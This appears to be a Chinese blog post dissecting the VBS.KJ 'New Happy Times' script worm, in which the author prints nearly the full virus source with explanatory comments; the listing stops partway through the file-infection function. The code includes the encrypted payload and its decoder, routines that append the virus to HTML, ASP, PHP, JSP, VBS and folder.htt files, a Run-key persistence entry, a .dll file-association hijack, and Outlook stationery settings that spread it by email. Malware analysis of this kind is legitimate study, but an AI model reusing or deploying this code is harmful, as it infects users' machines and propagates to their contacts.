”新快乐时光“再解

类别:VC语言 点击:0 评论:0 推荐:

'VBS.KJ 新快乐时光,网页宏病毒病毒
' 今天又一次被这个病毒感染,讨厌的错误对话框又跳了出来,不要我知道就罢了,竟然写出这么烂的代码恶心人.
' 一怒之下,将其解剖开来,看了个明白.病毒加密还比较有趣,至于最拙劣的也就是执行的时候会出现错误提示.
' 本人属于VB 低级水平(倾向于C的人),写个HELLO WORLD还可以,在下面的分析中也许会有很多错误的地方,
' 还请谅解
<BODY onload="vbscript:KJ_start()">    '  病毒代码从这里开始执行
<!--
 * This file was automatically generated by Microsoft Internet Explorer 4.0
 * using the file %THISDIRPATH%\folder.htt (if customized) or
 * %TEMPLATEDIR%\folder.htt (if not customized).
 -->
<html>
        <body scroll=no onload="Init()">
        ......
        </body>
</html>
.......
<script language=vbscript>  ' 下面一句也有病毒
document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"
</script>
<script language=vbscript>   ' 病毒体藏在FOLDER.HTT 文件的最后,并且是加密过的,我喜欢
ExeString = "=feBkOa^o]%AqeeMbpm%SZlMbpm%A]`kb]Lbdf%:mhe^LZc^`l%?PG%PpKa^id%PffIZq`%LrZ>%CagZiq=bpcPm[HBXlqYkm%!HBL^q<bf%!HB<kbYm^Jaebbm!DCIad^Fl!DC@j^Zq]FZfd!DCMjhi^_Zmb =g]Kn[Cmg\qahgCC:mh^gaLh!Cae^MYma)LribKmk&Hk>kogkO]lnj]GbpmK^mJ^ZaL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$*MfmKmk5KbY]Mbei'O]Z]>deA_Fflmo MfmKmk)DC\kmZol!!5;)LjEbf!MjhLmo!5)Me]gJ^ZaL^fm&<elk^=qbq?nk[mblfBf]F^F^Mvh^Lqj6amqMe]gJ^ZaL^fm&<elk^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%>bebHZme$+?bi]M^jh'Poam^5?G=RggelY]6#o_k\kfhm3CCXplZkq 7o_;kEcQeiLqjn[<oD_#AmjdM^ulCae^Q]fi+;ehp]P]mC9mmoa[:?LL&@^q>beb ?bi]IZq`>:mqjb[+Ymmoa[nq]l:,->ep]O]Z]Q]fi+;ehp]P]mCae^Q]fi5?PG'Hm]gMbpm?fd^!Cae^MYma)0A_Qqi^Plk:aqeeLa^k?fd^Mbei'Tjbmbo[@jE_9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm=elbA_Qqi^Plk:o_kQ`^g?bi]M^jh'Poam^n[<oD_#O[pL^qq>k\Bc?fd^Mbei'@dhlb _
\Bc>k\?rf\mfgg?rf\mfggHB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYkB_DZlqAg]bp<a^j6(Me]gA_I]_m%D<Zp]!<rjk^klLmoag`&$*55I;Zlb \!Me]gCC<eYg`bKn[5?ffZev<blh2ULn_=6(Bdl^DC@`Zgd]Ln_6@`k!>k\!I]_m%D<Zp]!<rjk^klLmoag`&$*&&.!3ULrZ>:)=g]A_=elbDG;aZk_^LrZ6Eb]%;nko]gmPlkbk_%*)DZlqAg]bp<a^j=g]A_=g]>ng`lbhk>ng`lbhkDC@j^Zq]FZfd!Hg=kkljKbknfbG^ulF^BkOa^o]6amjdQ`^g>qfl?rf\mfgg=g]A_KaZo]?bi]6D^_q PbkHZme$,Mjh`oYfCae^pT<hjehg>bebkUFf[khpg_mKaZo]]UPlZmfgg^oqU[iYgd+`mfBc!?PG'?fd^>ualmp La^j^?fd^&Mabf@YeeCC:mh^gaLh!P`Zkb>beb$aqee&>ik^K^m>bebL^fm6CKH'Lh^gQ]qmCae^%KaZo]?bi]%+)lknb!Cae^Q]fi+Okbq]9AMJD7o_;kEc4#;L<Rlfeh^\6o[p[kbml3HBXlqYkm%!6#o[@jE_AqeeMbpm>bebL^fm&<elk^=g]A_<^_^memF\6OlLe]ee+J^`O]Z]%ADBQX<RJK>KLXNP=KUF\^gqambbkU=b^ZnilNp]kF<HnqDhhhN^kpahg5PpKa^id'Kb_K^^\!EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTF^aaZObjPlP`^ei&K^dO _
q]EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiT<hjhhlbNlbLm^lbhk]kr$*%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJUBa]gmflb^pTA]_ZrdmBaUPg_mtYk^YEb\oglhclUHrlehlc>uhk^pkU#E^cl!HrlEhlcO^okbhk$*'-TFZfdULqYmblf^kvGZj]%P`Zkb>beb!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTB]bfmbqa^lY=b^ZnilB]#ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpTD^_q HnqDhhhN^kpahg))#')YEZbiTPba]LqYmblf^kvGZj]%P`Zkb>beb!TkLabde'O]`Poam^ADBQX<RJK>KLXNP=KUPg_mtYk^YEb\oglhclUHc^b\bT2'-THnqdhhhTHiqahgpTFZfdU>aamhoHk^c]k^k[^)),*-/+%J>@\<PHO<;ZeiDCJYbeO]`!@D>VW<NOJ>GQWNLBJULl^mp^j^UJa\klkh_qTPbk\hppF^pkZ`ff`Pm[lvkm^jTIkl^bebkUFf[khpg_mGnmighdAgmbjg^qL^qlbgdkU)^(])/())-())-()\-())-())-())-,/U-(*^-+/)$Ygd!@YeeCCF^aeKb_!EC>R\;NKO=GM\ML>OTLhclpZo]UFf[khpg_mYObgagplFMU@mkkbfmObjlblfUPff]htkFbklZdag`Kn[pqlmbeUIog_bi]lUJa\klkh_qHnqdhhhBgq]kgblLblmbk_lU-Y)]-*))-())-())`())-())-())-(-/Y()*b(,/-%_dZghOlLe]ee+J^`TjbmbAH=RX@MKKBFMXR _
KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)ULmmelgdULhmblflUJYbeY=]bqgkIo]_^o]g\b%*0))0/$KB?X=TGK=<^deHBFZfdK^d AH=RX@MKKBFMXRK>KYKh_qoZkbTFb`jhll^mUL^_b`]U*-&)U@gfflfUF^aeLblmbk_lUK]pLqYmblf^kv%_dZghCCnjeZ`b>hea]k!I]_m%ObgMYma)+#Iog`k^e?fd^lY;hfjggCae^pTFb`jhll^mP`Zkb\ULqYmblf^kv=g]>ng`lbhk>ng`lbhkDC@j^Zq]Fbia^n%!Lf>ojhkJ^lre^K]qmM^jhIZq`6A_Kgm!CKH'Cae^Bpblqk!PffIZq`PL`jbiq&^qbLa^kMbeiI^la:lvkm^j++U>k\BcBcM^jhIZq`6lrpl^f0*ULa^kLqYkmRh?bi]6ObgMYmaPQLMBEUDbjg^i++'ade>ep]PlZkqMi?fd^:PbkHZmeKRLQ=FUH]kgbd']id=g]A_OlLe]ee+J^`TjbmbAH=RXIG<:IWF:@@BGBTLhclpZo]UFf[khpg_mYObgagplY;nko]gmS]klfggUOmgUH]kgbd,+$Lm^jmNm>beb?PG'<lhr?fd^TagI^la#pbZUdgoZei&`bc%PffIZq`p^_T?hi\^k+`mm?PG'<lhr?fd^TagI^la#lvkm^j++UhbpZid'`f^%TagI^la#lvkm^j++Ua]ldqgi'ffb<ZidDG9iibf]Ml PbkHZmeo^[Y>hea]k'elm)amqOlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY&]eiT%\eecae^PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU'adeU@ggmbfmQqi^$Zmheb`Ymb _
(q*el]logelY]PlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei^bebT=^cYneqA\hkT%TkLabde'O]`KbY]!@D>VW<E>KL>PWKHLLUou\_bi]U=b^ZnilB\lfU&PpKa^id'Kb_Pkfl^@D>VW<E>KL>PWKHLLU]id_bi]UL`jbiq=g`ff^U$O?K\kfhmPlP`^ei&K^dOkbq]EC>R\;E:PK>L\JHHQT]ei>bebTLabdeULh^gY;hfjYg]Y%PffIZq`L^fmHZmeOL\oaim+]q^.OlLe]ee+J^`TjbmbAH=RX@D:LP=LXOGHMY\eeCae^YKa^id>qYHkhm]kmvKa^blAZk\e^okUPP@IklhlU$t3(+.1;:.*1.,?%**@>&1@1/&-(::-(;14(1<zTkLabde'O]`Poam^ADBQX<I9LLBKXKLGMUade?fd^UP[kbmlAhpl>g`g]^Y%x0.*0)/,.%-1-;&*.<+&?)?2*()<-,?13;,+1uK^m>bebL^fm6CKH'Lh^gQ]qmCae^%KmZolNiCae^)*%mom^?bi]M^jh'Poam^N[lQ]qm?bi]M^jh'<igl^>ga?nk[mblf?nk[mblfDGDbdbAm!&BcBgT`^kb57amjdQ`^g>qfl?rf\mfgg=g]A_LabpDh\^lbhk6ag\nj]gm+dh\^lbhkBcE^cl!MealEl[Zmfgg%,:_fd^La^kMealEl[Zmfgg:Fba MafkEh`Ymblf%2&Bc?LL&@^q=qmbflblfGZj]!MealEl[Zmfgg47me]gLabpDh\^lbhk6I]_m%LabpDh\^lbhk$E^k MafkEh`Ymblf*E^k ?LL&@^q>bebFZfb MafkEh`Ymblf&>k\BcBcE^k MafkEh`Ymblf;,Q`^gMafkE _
Ymblf6LabpDh\^lbhkT=g]A_CCnjeZ`b>hea]k!Q`blIg\Zqahg&>k\Bc>k\?rf\mfgg?rf\mfggHBFZfdK^d K^dKmk)>bebFZfb!Lf>ojhkJ^lre^K]qmK^dL^fmKmk5PpKa^id'Kb_K^^\!Kb_Lmo!F^Kb_M^jhLmo6Me]gOlLe]ee+J^`TjbmbK^dKmk)>bebFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBH[lKn[%;nko]gmPlkbk_Kn[B6-MbkmHrl6(AgPeae^LknbMbkmHrl6L^lqGnm#*B_L^lqGnm6+5Mabf@mkkbfmLqjbgd6CagZiq=bpc3U>uamAgBf]F^Lf>ojhkJ^lre^K]qmL^qMafk?hi\^k5?PG'@bl?hi\^k%;nko]gmPlkbk_K^m<b\Pm[:<kbYm^LZc^`l!P[kbmlbgd&=b`lbhkYkr!P]mCge]bjl:Mafk?hi\^k+Kn[Cge]bjl>hea]k<lmgm5)?ho>Z``Mbei?ld]^obg>hea]kl?hi\^k@gngq6Cge]bj<hrfm(*<b\Pm['^\]Cge]bj<hrfm%L^fm>hea]k'KYf^G^ulF^=f[Ln_&<hrfm:)Q`^gEZplBga]q<eYk:BgplkKbn!<rjk^klLmoag`)U)D^g%;nko]gmPlkbk_&.!Pm[Lqjbgd6Ja]!@mkkbfmLqjbgd$EZplBga]q<eYk$.$E^k <noj^gqKmkff`*DZlqAg]bp<a^j&*&<rjk^klLmoag`5DG;aZk_^LrZ!<rjk^klLmoag`)DZlqAg]bp<a^jKn[B6.>ik^A_Pm[>5)La^k<rjk^klLmoag`5<rjk^klLmoag` _
f[Ln_&Bmbe!*&T=qbq=h>ep]g6-?ljc5*LhCge]bj<hrfmA_I;Zlb Ln_Kmkff`5E@Yl^%<b\Pm['Fl^f%bLa^kBcc9?hi\^k@gngqMabf@mkkbfmLqjbgd6@mkkbfmLqjbgdAa\LrZ'Bq]f!g#*YBpbm<h=g]A_=g]A_F^qqE^kmBk\^q@`Zk5BkkmkO]o!@mkkbfmLqjbgd$U$E^k <noj^gqKmkff`*)Kn[Plkbk_6Eb]%;nko]gmPlkbk_%E^kmBk\^q@`Zk()%Ebf!<rjk^klLmoag`&%EZplBga]q<eYk&.!@mkkbfmLqjbgd6HB<a^f`^Pm[!@mkkbfmLqjbgd$EZplBga]q<eYk>gaB_>gaB_EhlhHBH[lKn[5<rjk^klLmoag`>ga?nk[mblf?nk[mblfDGHkhmY`Zq]!Hg=kkljKbknfbG^ulO]`I^laO^dn^5EC>R\DH<>DXF>;ABK=ULl^mp^j^UJa\klkh_qTHnqdhhh>qmj^lpT=^dj^^=fkd=b_k^b6TkLabde'O]`KbY]!O]`I^laO^dn^&Bc=bpc=^dj^^5MabfAaldA]`kb]6>bg^dr=fkd#3YBf]F^Cgkf5*qg.=bpc=^dj^^5DGG[hPm[!AaldA]`kb]CCnjeZ`b>hea]k!AaldA]`kb]F^qqPpKa^id'Kb_Pkfl^O]`I^laO^dn^)<blh<^`o]^=g]>ng`lbhk>ng`lbhkDCrefZd]?hi\^k%HZmeFZfb!Lf>ojhkJ^lre^K]qmL^q?hi\^kKYf^5?PG'@bl?hi\^k%HZmeFZfb!P]mQ`blCae^p6Cge]bjGZj]'?fd^lAmq=qbpll: _
>hk=Z\eMafk?bi]BkMafk?bi]l>beb=qm5N@Yl^%>LH+?^mBpm^kkbhkFZfb Mafk?bi]'I^la&Bc?bi]>qq6@MFHk>beb=qm5ELFEHk>beb=qm5>KIGkCae^Bpm:IEHLj?fd^>ul6CLMMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%elfe!Bdl^F^?fd^>ul6O;PMe]g;ZeiDC>hi^k\Mh%Labp>beb&IZq`%sZl&>ik^Bc?bi]>qq6@MMMabfElm>ualmp6.>k\BcGbpmA_%M<Zp]!I^laG^e^5N@Yl^%ObgMYmaA]ldqgiU!Lj!R;Zlb IZq`GZj]:N<^k^!TagI^la#=bkdmlh&La^kAql>qfkml5*>gaB_B_@mmBpblqk6(Me]g>LH+;hiv>bebPbkHZmekrlq]f,/T]^pcmhm&bgf%I^laG^e^>LH+;hiv>bebPbkHZmeo^[Y>hea]k'elm)HZmeFZfb>k\Bc>k\?rf\mfgg?rf\mfggHBL^q<bf%!Lf>ojhkJ^lre^K]qm>ko&<ebYkL^lqAm:PL`jbiq&L\oaimCmeekYf^B_=kkLa^kBkOa^o]6amjd=elbBkOa^o]6o[pBf]F^F^BkOa^o]6o[pMe]gK^m>LH5<o]ZmbG[cb[m!K\kfhmbk_'?fd^Lvkm^jG[cb[m&LblPpKa^id6;k^^l^H_b^\q PP[kbml'Le]ee!Bdl^L^q:imd^H_b^\q6ag\nj]gm+Yiii]ml%DC\_n^pl:imd^H_b^\q&l^q;ELF<!x>2,2<<+/%*<C(&*.<)&><;2*()<-,?=20:) _
:imd^H_b^\q&\kbYm^Fflm^f\^%!P]mTkLabde::imd^H_b^\q&@^qG[cb[m!&:mhe^LZc^`l'lbl<EPA=!s)=1+?>-)&?-1,&.)<?*02--%))>(<2---+/0v&:mhe^LZc^`l'\o]ZmbAglqYg\b K^m>LH5:mhe^LZc^`l'@blH[g]\m%!Bf]F^P]mAaldLZc^`l6>LH+<kbs]l>hk=Z\e=bpcM^jhBk=bpcH[g]\mB_<blhL^fm&=kfn^Mvh^96+9g]<blhL^fm&=kfn^Mvh^96*La^k>uamCgk=g]A_>bg^dr=fkd:=bpcM^jh'=oao^I]mmbjK]qm=bjHme]k:oj!,&K^f]hjas^?hob6-Mh+Lla^o9kk%a:Bgq !2Kk\G^ulQ]fiPlkbk_6>hka6*LhI]g!Q`blQ]qm&MbeiGre69l\%Eb]%LabpL^qq$b%.!A_Q]fiKmf:*,La^kMbeiGre6*1=elbA_Q]fiKmf:*)La^kMbeiGre6*2=g]A_L^fm;aZo6@`k!Q]fiKmf*Hme]k:oj!bEh],B_L^fm;aZo6@`k!0,Q`^gM^jh<a^j6;ak%)1>gaB_M^jhLmoag`5MbeiLqjbgdQ]fi@`ZkG^ulRfEh`cLmo6=q^`mm^%=feDbq:ko ,)LabpL^qqsZ<kI^C^r>jk!-!6Gmabj:ko )o_;kEcH]r:oj!*&6Lla^o9kk%)#o[@jE_#Dbq:ko +5Hq`^k>jk!/!#n[<oD_D^v9kk%+:#Hme]k:oj!,&sZ<kI^>hka6*LhI]g!Bp^ _
jbgd!#nR<oD_M^jhGnj6>k\!Ja]!Bp^Lqjbgd$b%.!o[@jE_#BcM^jhGnj6.0Me]go[@jE_#MbeiGre6+-o[@jE_#>k\BcsZ<kI^L^fm;aZo6@`k!Q]fiKmf(D^v9kk%aFl\-&!#n[<oD_B_L^fm;aZo6@`k!/0Q`^go_;kEcQ]fi@`Zk5o_;ko[@jE_#>ik^BcM^jh<a^j6;ak%*2La^ksZ<kI^L^fm;aZo6sZE_o_;kEcBf]F^#n[<oD_MafkM^ul6LabpL^qqQ]fi@`Zko_;kEcK]qmo_;kEc=q^`mm^%LabpL^qq!LabpL^qq6=q^Plkbk_6MbeiLqjbgdAmjdM^ul64#l`jbiqeZk_nZd]6o_k\kfhm7sZ<kI^]h`mf^kl'poam^4#]fnlqqe^:ihpamblf3Z_kherl^4d^_q2)iu3mlh3)mp4ta]me2)iu3aba`aq2)iu3s*ag]bp3+53ofkb[fdbmv2af\]^k79#:MHE>QG:J=6DGX`r]lm@>BD@M6-PBALA6-\ha]6\le'fp&#Z`lbobP':`lbobQ<leihk]gm;5,9III=M74#(aao7#o[@jE_9(l`jbiq6#o[@jE_9l\oaimdZgdmZ`b5o[p[kbml7o_;kEcQ`blQ]qmo_;kEcRfEh`cLmosZ<kI^5,k\kfhm7sZ<kI^5,:H=V6#o[@jE_9(AQEE7O_kM^ul6LabpL _
qsZ<kI^MgEl[dLqjn[<oD_#DGWlm^jm!&TagI^la:?LL&@^qKi^`aZeCge]bj!)&TA_%>LH+>beb=qbpll!TagI^la#pbZU?ld]^o&amqLa^k?PG'<lhr?fd^TagI^la#pbZU?ld]^o&amq%PffIZq`p^_TdctYee+_b_>k\BcBc!?PG'?fd^>ualmp PbkHZmekrlq]f,/T]^pcmhm&bgfLa^k?PG'<lhr?fd^TagI^la#lvkm^j++Ua]ldqgi'ffb)ObgMYmapqlmbe,+Yccp^de'da_>gaB_>ga?nk[mblf"
Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute (ThisText)  ' 执行代码!
</script>
</BODY>
</HTML>
' 病毒结束
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk
' 定义的一些变量,这里分别解释一下
' InWhere               判断程序是在HTML执行,还是已经进入到病毒代码部分
' HtmlText              不用多说了,就是HTML文件的内容
' VbsText               病毒需要用的脚本VBS文本内容
' DegreeSign
' AppleObject
' FSO                   太熟悉了,就是脚本里处理文件系统的一个对象
' WsShell               执行WINDOWS程序
' WinPath               存放WINDOWS的系统路径
' SubE
' FinalyDisk    最后一个硬盘是什么,好黑,要通吃??
Sub KJ_start()  ' 开始了,总体结构还比较清晰
KJSetDim()      ' 设置各种变量
KJCreateMilieu()'
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub
 
Function KJAppendTo(FilePath, TypeStr)
' 对目标文件,其实就是FOLDER.HTT进行检查,如果没有感染过就把病毒体附加上去
        On Error Resume Next
        Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' 打开文件读
        TmpStr = ReadTemp.ReadAll
        If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
                ReadTemp.Close          ' 如果打开的文件中没有 "KJ_start()"这个字符串,就说明没有被感染
                Exit Function           ' 对空文件不处理的
        End If                      ' 以下是满足感染条件的文件
        If TypeStr = "htt" Then     ' 如果是HTT文件,每个目录下都有的,如果你要看的话就查看隐藏文件就可以了
                ReadTemp.Close                  ' 刚才的打开方式是读,现在要写了,需要关闭文件,再打开写(我猜的 ^_^)
                Set FileTemp = FSO.OpenTextFile(FilePath, 2)
                FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
                FileTemp.Close                  ' 在HTT文件的第一行写上"<BODY onload="vbscript:KJ_start()"> ",本文开始我也做了注释
                Set FAttrib = FSO.GetFile(FilePath)
                FAttrib.Attributes = 34 ' 改变文件属性,隐藏
        Else
                ReadTemp.Close
                Set FileTemp = FSO.OpenTextFile(FilePath, 8)
                If TypeStr = "html" Then ' 如果是HTML 文件,要把<BODY onload="vbscript:KJ_start()">写在<HTML></HTML>之间才会执行
                        FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
                ElseIf TypeStr = "vbs" Then
                        FileTemp.Write vbCrLf & VbsText
                End If
                FileTemp.Close
        End If
End Function

Function KJChangeSub(CurrentString, LastIndexChar)
' 切换目录
         If LastIndexChar = 0 Then
                If Left(LCase(CurrentString), 1) <= LCase("c") Then ' 如果是第一个硬盘就转到最后一个硬盘
                        KJChangeSub = FinalyDisk & ":\" SubE = 0        ' 看来它是循环操作的
                Else                                                ' 其他硬盘则用盘符减一(如:'D'-1= C)
                        KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"
                        SubE = 0
                End If
        Else
                KJChangeSub = Mid(CurrentString, 1, LastIndexChar)
        End If
End Function

Function KJCreateMail()
' 通过OUTLOOK向地址簿中的地址发送EMAIL。
        On Error Resume Next
        If InWhere = "html" Then
                Exit Function     ' 如果是在HTML中运行的话,不进行这个步骤
        End If                            ' 首先感染BLANK.HTML文件,这个文件在IE设置中如果缺省的"使用空白页"就会调用的
        ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
        If (FSO.FileExists(ShareFile)) Then    ' 如果存在就直接感染
                Call KJAppendTo(ShareFile, "html")
        Else                                                               ' 如果不存在就伪造一个带病毒的BLANK.HTM文件
                Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)
                FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
                FileTemp.Close
        End If
        DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
        OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
        WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
        Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
        Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
        WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
        Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
        Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
        WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Call
        KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
        KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
'  检测系统是否安装了 脚本解释器,如果没有的话,就使用系统文件Kernel,Kernel32来执行各种操作
' 充分暴露了WINDOWS的脆弱性
        On Error Resume Next
        TempPath = ""
        If Not (FSO.FileExists(WinPath & "WScript.exe")) Then
                TempPath = "system32\"
        End If
        If TempPath = "system32\" Then
                StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
        Else
                StartUpFile = WinPath & "SYSTEM\Kernel.dll"
        End If
        WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
        FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"
        FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop..ini"
        Call KJAppendTo(WinPath & "web\Folder.htt", "htt")
        WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
        WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"
        Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)
        FileTemp.Write VbsText    ' 这里把Kernel.dll,Kernel32.dll都写进了病毒
        FileTemp.Close
End Function

Function KJLikeIt()
        If InWhere <> "html" Then
                Exit Function
        End If  ' 分析当前文件的路径
        ThisLocation = document.location
        If Left(ThisLocation, 4) = "file" Then
                ThisLocation = Mid(ThisLocation, 9)
                If FSO.GetExtensionName(ThisLocation) <> "" Then
                        ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
                End If
                If Len(ThisLocation) > 3 Then
                        ThisLocation = ThisLocation & "\"
                End If
                KJummageFolder (ThisLocation)
        End If
End Function

Function KJMailReg(RegStr, FileName)
        On Error Resume Next
        RegTempStr = WsShell.RegRead(RegStr)
        If RegTempStr = "" Then
                WsShell.RegWrite RegStr, FileName
        End If
End Function

Function KJOboSub(CurrentString)
' 解析当前路径嵌套的深度
        SubE = 0
        TestOut = 0
        Do While True
                TestOut = TestOut + 1
                If TestOut > 28 Then   ' 如果深度超过了28就返回最后一个硬盘根目录
                        CurrentString = FinalyDisk & ":\"
                        Exit Do
                End If
                On Error Resume Next
                Set ThisFolder = FSO.GetFolder(CurrentString)    ' 当前目录字符串
                Set DicSub = CreateObject("Scripting.Dictionary") ' 构造一个字典,存放目录和深度
                Set Folders = ThisFolder.SubFolders                     ' 取得子目录
                FolderCount = 0                                                                 ' 子目录个数初始化为零
                For Each TempFolder In Folders                                  ' 查看子目录个数
                        FolderCount = FolderCount + 1
                        DicSub.Add FolderCount, TempFolder.Name
                Next
                If DicSub.Count = 0 Then                                                ' 如果子目录为空,即无子目录
                        LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' 取得最后路径中最后一个'/'
                        SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' 最深的子目录
                        CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到父目录
                        SubE = 1
                Else
                        If SubE = 0 Then
                                CurrentString = CurrentString & DicSub.Item(1) & "\"   ' 遍历字典中存放的子目录
                                Exit Do
                        Else
                                 j = 0
                                 For j = 1 To FolderCount
                                 If LCase(SubString) = LCase(DicSub.Item(j)) Then
                                        If j < FolderCount Then   ' 进入到子目录
                                                CurrentString = CurrentString & DicSub.Item(j + 1) & "\"
                                                Exit Do
                                         End If
                                  End If
                                  Next
                                  LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)
                                  SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)
                                  CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' 切换到上层目录
                        End If
                End If
        Loop
        KJOboSub = CurrentString
End Function

Function KJPropagate()
        On Error Resume Next
        RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
        DiskDegree = WsShell.RegRead(RegPathValue)
        If DiskDegree = "" Then
                DiskDegree = FinalyDisk & ":\"
        End If
        For i = 1 To 5  ' 对各级目录下的文件进行感染
                DiskDegree = KJOboSub(DiskDegree)
                KJummageFolder (DiskDegree)
        Next
        WsShell.RegWrite RegPathValue, DiskDegree  ' 写下注册表,记录最深的一个目录
End Function

Function KJummageFolder(PathName)
        On Error Resume Next
        Set FolderName = FSO.GetFolder(PathName)
        Set ThisFiles = FolderName.Files
        HttExists = 0
        For Each ThisFile In ThisFiles
                FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
                If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
                        Call KJAppendTo(ThisFile.Path, "html") ' 对当前目录下面所有 HTM,HTML,ASP,PHP,JSP文件进行感染
                Else
                        If FileExt = "VBS" Then     ' 对 VBS文件进行感染,这类感染比较方便
                                Call KJAppendTo(ThisFile.Path, "vbs")
                        Else If FileExt = "HTT" Then ' 如果存在HTT文件
                                        HttExists = 1
                End If
        Next
